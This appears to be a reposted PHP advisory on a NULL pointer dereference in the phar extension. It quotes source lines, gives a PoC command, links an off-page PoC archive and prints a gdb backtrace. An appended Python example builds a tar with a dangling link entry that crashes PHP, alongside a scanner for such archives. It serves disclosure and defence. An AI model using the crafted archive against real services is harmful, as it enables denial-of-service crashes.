Description:
------------
If a Tar entry has the Link indicator set and points to a nonexistent file, phar_get_link_source() returns NULL (phar/util.c:69). The link target is looked up twice in the archive manifest, first under the raw link name and then under the fixed-up path; if both lookups fail the function gives up:

    if (SUCCESS == zend_hash_find(&(entry->phar->manifest), entry->link, strlen(entry->link), (void **)&link_entry) ||
        SUCCESS == zend_hash_find(&(entry->phar->manifest), link, strlen(link), (void **)&link_entry)) {
        .......
    } else {
        .......
        return NULL;
    }

The caller in phar_get_entry_data() at util.c:497 passes that return value straight into phar_get_fp_offset() without checking it:

    (*ret)->zero = phar_get_fp_offset(phar_get_link_source(entry TSRMLS_CC) TSRMLS_CC);

The NULL pointer dereference occurs in phar_internal.h:444, where entry is NULL:

    if (!entry->is_persistent)

This causes PHP to segfault. Any code path that opens such an entry through the phar:// stream wrapper reaches it; in the backtrace below it is a plain file_get_contents() on a phar:// URL, so a crafted archive handed to a script that reads phar:// paths is enough to crash the process (denial of service).
Proof Of Concept:
-----------------
./php readphar.php Null_ptr_deref_in_phar_get_fp_offset.tar.phar
Segmentation fault

The PoC archive can be found here: https://www.dropbox.com/s/6hks64dopgcco9f/POC_Null_ptr_deref_in_phar_get_fp_offset.zip?dl=0
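The archive shape described above can be reproduced in a few lines and, more usefully, screened for before PHP ever parses it. The following is an added example, not the advisory's PoC (which is hosted off-page) and not PHP's own code. It builds a constructed tar in memory whose link entry test.php points at a member that was never added, and it scans any tar for link entries whose target cannot be found in the member table, using the same two lookups (raw link name first, then a normalised path) as the quoted phar_get_link_source() snippet. The use of a symlink-type entry (typeflag '2'), the following of link-to-link chains with a hop bound, and the names build_link_tar, _fix_path and find_dangling_links are this example's own assumptions; the advisory does not say which link type its PoC used.

```python
import io
import posixpath
import tarfile


def build_link_tar(linkname="missing.php"):
    """Constructed sample archive: one real member plus a link-type entry
    "test.php" whose target is `linkname`.  With the default argument the
    target does not exist, which is the shape the advisory describes."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        body = b"<?php echo 'hello';\n"
        real = tarfile.TarInfo("index.php")
        real.size = len(body)
        tar.addfile(real, io.BytesIO(body))

        # Link indicator set: typeflag '2' (symlink).  Assumed here; the
        # advisory does not state which link type its PoC used.
        link = tarfile.TarInfo("test.php")
        link.type = tarfile.SYMTYPE
        link.linkname = linkname
        tar.addfile(link)
    return buf.getvalue()


def _fix_path(path):
    """Rough stand-in for phar_fix_filepath(): collapse "." and ".." and
    drop a leading "/" so the second lookup has a chance to match."""
    return posixpath.normpath(path).lstrip("/")


def find_dangling_links(tar_bytes, max_hops=64):
    """Return (entry name, linkname) pairs whose link chain never reaches a
    real member.  The two lookups per hop mirror the two zend_hash_find()
    calls quoted from phar_get_link_source(); a link that fails both is the
    case in which that function returns NULL.  Chain following and the hop
    bound (which also stops a -> b -> a cycles) are this example's own."""
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r") as tar:
        members = {m.name: m for m in tar.getmembers()}

    dangling = []
    for name, member in members.items():
        if not (member.issym() or member.islnk()):
            continue
        cur, hops = member, 0
        while cur.issym() or cur.islnk():
            target = members.get(cur.linkname)
            if target is None:
                target = members.get(_fix_path(cur.linkname))
            hops += 1
            if target is None or hops > max_hops:
                dangling.append((name, member.linkname))
                break
            cur = target
    return dangling


if __name__ == "__main__":
    for target in ("missing.php", "index.php", "./index.php", "test.php"):
        print(target, "->", find_dangling_links(build_link_tar(target)))
```

Run as a script it prints one line per constructed variant; only the missing target and the self-referencing link are reported, while a direct or "./"-prefixed reference to index.php resolves cleanly. Feeding an archive to find_dangling_links() before passing it to a phar-aware PHP is a cheap pre-check for upload handlers on builds that lack the NULL check.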
Actual result:
--------------
gdb-peda$ bt
#0 0x0000000000900df2 in phar_get_fp_offset (entry=0x0)
at /home/elaw/php-5.6.8_patched_phar/ext/phar/phar_internal.h:444
#1 0x0000000000904460 in phar_get_entry_data (ret=0x7fffffff9570,
fname=0x7ffff7f79bc8 "/home/elaw/php-5.6.8_patched_phar/sapi/cli/Modified_Tar.tar.phar", fname_len=0x40, path=0x7ffff7f77c80 "test.php", path_len=0x8, mode=0x155dd40 "r",
allow_dir=0x0, error=0x7fffffff95b0, security=0x0)
at /home/elaw/php-5.6.8_patched_phar/ext/phar/util.c:497
#2 0x000000000092de69 in phar_wrapper_open_url (
wrapper=0x1a0bb40 <php_stream_phar_wrapper>,
path=0x7ffff7f79d50 "phar:///home/elaw/php-5.6.8_patched_phar/sapi/cli/Modified_Tar.tar.phar/test.php", mode=0x15b7d60 "rb", options=0x0, opened_path=0x0,
context=0x7ffff7f72e78) at /home/elaw/php-5.6.8_patched_phar/ext/phar/stream.c:286
#3 0x0000000000cf3926 in _php_stream_open_wrapper_ex (
path=0x7ffff7f79d50 "phar:///home/elaw/php-5.6.8_patched_phar/sapi/cli/Modified_Tar.tar.phar/test.php", mode=0x15b7d60 "rb", options=0x8, opened_path=0x0,
context=0x7ffff7f72e78)
at /home/elaw/php-5.6.8_patched_phar/main/streams/streams.c:2064
#4 0x0000000000b0491e in zif_file_get_contents (ht=0x1, return_value=0x7ffff7f79d20,
return_value_ptr=0x7ffff7f3c980, this_ptr=0x0, return_value_used=0x1)
at /home/elaw/php-5.6.8_patched_phar/ext/standard/file.c:548
#5 0x00000000009353e2 in phar_file_get_contents (ht=0x1, return_value=0x7ffff7f79d20,
return_value_ptr=0x7ffff7f3c980, this_ptr=0x0, return_value_used=0x1)
at /home/elaw/php-5.6.8_patched_phar/ext/phar/func_interceptors.c:225
#6 0x0000000000eeaeec in zend_do_fcall_common_helper_SPEC (execute_data=0x7ffff7f3cc18)
at /home/elaw/php-5.6.8_patched_phar/Zend/zend_vm_execute.h:558
#7 0x0000000000f0441e in ZEND_DO_FCALL_SPEC_CONST_HANDLER (execute_data=0x7ffff7f3cc18)
at /home/elaw/php-5.6.8_patched_phar/Zend/zend_vm_execute.h:2599
#8 0x0000000000ee63d4 in execute_ex (execute_data=0x7ffff7f3cc18)
at /home/elaw/php-5.6.8_patched_phar/Zend/zend_vm_execute.h:363
#9 0x0000000000ee7d7c in zend_execute (op_array=0x7ffff7f70d00)
at /home/elaw/php-5.6.8_patched_phar/Zend/zend_vm_execute.h:388
#10 0x0000000000e1e55b in zend_execute_scripts (type=0x8, retval=0x0, file_count=0x3)
at /home/elaw/php-5.6.8_patched_phar/Zend/zend.c:1341
#11 0x0000000000ca9dec in php_execute_script (primary_file=0x7fffffffcd10)
at /home/elaw/php-5.6.8_patched_phar/main/main.c:2597
#12 0x0000000001190280 in do_cli (argc=0x5, argv=0x60400000ded0)
at /home/elaw/php-5.6.8_patched_phar/sapi/cli/php_cli.c:994
#13 0x0000000001192ee7 in main (argc=0x5, argv=0x60400000ded0)
at /home/elaw/php-5.6.8_patched_phar/sapi/cli/php_cli.c:1378
#14 0x00007ffff4b0db45 in __libc_start_main (main=0x1191984 <main>, argc=0x5,
argv=0x7fffffffe2a8, init=<optimized out>, fini=<optimized out>,
rtld_fini=<optimized out>, stack_end=0x7fffffffe298) at libc-start.c:287
#15 0x0000000000428d79 in _start ()
# 0day.today [2017-12-31] #